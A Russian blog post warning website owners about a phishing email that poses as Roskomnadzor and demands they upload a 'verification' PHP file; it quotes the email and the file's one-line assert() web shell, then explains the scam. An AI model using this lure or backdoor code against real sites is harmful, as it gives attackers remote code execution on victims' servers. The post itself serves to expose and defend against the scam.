Всем известно, что сейчас Роскомнадзор формирует «реестр организаторов распространения информации» (закон о блоггерах). Естественно, что владельцы сайтов бояться попасть по ошибке в какой-нибудь список этой организации. Этим воспользовлись неведомые злоумышленники. Многие владельцы сайтов получили следующее уведомление:
Роскомнадзор zapret-info@roskomnadzor.org через sendgrid.me
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.xxxxxxx.com в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт www.xxxxxxx.com был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени www.xxxxxxx.com, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени www.xxxxxxx.com*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.www.xxxxxxx.com/reestr/reestr-id128032.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.xxxxxxx.com, следую инструкции указанной выше, то Ваш сайт www.xxxxxxx.com будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Конечно, многим сразу ясно, что это "развод", но мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неопытный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.
В чем заключается суть мошенничества? Пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor. Это может быть что угодно.
Что бросается в глаза при внимательном чтении послания: письмо послано через sendgrid.me, письмо чаще всего указывает преувеличенное количество посещений в сутки (более 3000), в последнем абзаце письмо грозит внести вас в черные списки интернет-провайдеров, а не распространителей информации. Все это тревожные звоночки.
Для собственного успокоения можно проверить действительно ли ваш сайт внесен в реальный реестр организаторов распространения информации, составленный Роскомнадзором
- 97-fz.rkn.gov.ru/website-owner/viewregistry
